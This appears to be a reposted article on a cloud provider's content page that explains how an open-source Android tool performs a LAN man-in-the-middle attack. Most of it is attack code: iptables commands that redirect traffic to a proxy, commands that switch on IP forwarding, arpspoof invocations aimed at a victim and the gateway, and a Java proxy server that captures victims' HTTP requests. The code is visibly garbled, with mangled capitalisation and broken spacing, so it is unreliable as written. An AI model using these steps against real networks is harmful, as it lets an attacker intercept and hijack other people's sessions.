Android man-in-the-middle attack

Source: Internet
Author: User

0x00

The idea of an Android man-in-the-middle attack is to hijack conversations between attacked machines and servers in a local area network. The attacked machine and server are working properly on the surface and have actually been hijacked by middlemen. This process can be clarified from a single graph.


The data sent by the attacking host is first passed through the attacker. The data returned from the server is also passed by the attacker and sent to the attacked host.


0x01

Android Open source broker attack Sample. Please refer to HTTPS://GITHUB.COM/SSUN125/LANMITM. We mainly analyze the principle of session hijacking in the effect preview in this link.

Watermark/2/text/ahr0cdovl2jsb2cuy3nkbi5uzxqv/font/5a6l5l2t/fontsize/400/fill/i0jbqkfcma==/dissolve/70/gravity /center "/>

Analysis of HTTPS://GITHUB.COM/SSUN125/LANMITM source code, to achieve ARP spoofing, there are four key steps:

1. NAT packet forwarding using iptables

public static final string[] Port_redirect_cmd = {"Iptables-t nat-f", "Iptables-f", "Iptables-t nat-i postrouting-s 0/ 0-j Masquerade "," Iptables-p FORWARD ACCEPT "," Iptables-t nat-a prerouting-j dnat-p tcp--dport +--to "+ AppContext. GetIP () + ":" + httpproxy.http_proxy_port};
This command is called in the Starthttpproxy method of the Proxyservice class.


2. Turn on port forwarding and agree to forward packets like routers

Private string[] Forward_commands = {"Echo 1 >/proc/sys/net/ipv4/ip_forward", "Echo 1 >/proc/sys/net/ipv6/conf/al L/forwarding "};
This is called in the Onstartcommand method of the Arpservice class.


3. ARP poisoning

if (One_way_host & arp_cheat_way)! = 0) {if (target_ip = = null) TARGET_IP = Appcontext.gettarget (). GetIP (); if (!target _ip.equals (Appcontext.getgateway ())) Arp_spoof_cmd = Getfilesdir () + "/arpspoof-i" + interfacename+ "-T" + target_ip + "" + Appcontext.getgateway (); elsearp_spoof_cmd = Getfilesdir () + "/arpspoof-i" + interfacename+ "-T" + APPCONTEXT.GETG  Ateway () + "" + Target_ip;arpspoof = new Thread () {@Overridepublic void run () {Shellutils.execcommand (Arp_spoof_cmd, True, false);}}; Arpspoof.start ();} if ((One_way_route & arp_cheat_way)! = 0) {arp_spoof_recv_cmd = Getfilesdir () + "/arpspoof-i" + interfacename+ "-t "+ appcontext.getgateway () +" "+ Appcontext.getip (); arpspoofrecv = new Thread () {@Overridepublic void run () {shellutils. ExecCommand (Arp_spoof_recv_cmd, True, false);}}; Arpspoofrecv.start ();}
this is inof the Arpservice classCalled in the Onstartcommand method.


4, in the attacker machine based on the socket principle, create a webserver, similar to the principle of using NANOHTTPD to achieve a simple webserver.

This can be obtained by the attacker's request to the attacker. and displayed on the interface.

The core code is as follows:

public class Httpproxy extends Thread {... @Overridepublic void run () {try {mserversocket = new ServerSocket (); Mserverso Cket.setreuseaddress (True); Mserversocket.bind (New Inetsocketaddress (Appcontext.getinetaddress (), HTTP_PROXY_PORT ), executor = Executors.newcachedthreadpool (), while (!stop) {Socket client = mserversocket.accept ();D Ealthread Dealthread = Null;switch (mproxymode) {case mode_proxy_simple:dealthread = new Simpledealthread (client, Monrequestlistener); Break;case mode_proxy_deep:dealthread = new Deepdealthread (client, monrequestlistener); break;} Executor.execute (Dealthread);}} catch (IOException e) {e.printstacktrace ();} finally {if (mserversocket! = null) {try {mserversocket.close ();} catch (Ioex Ception e) {e.printstacktrace ();}} if (executor! = null) {Executor.shutdownnow ();}}} ......}

Android man-in-the-middle attack

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.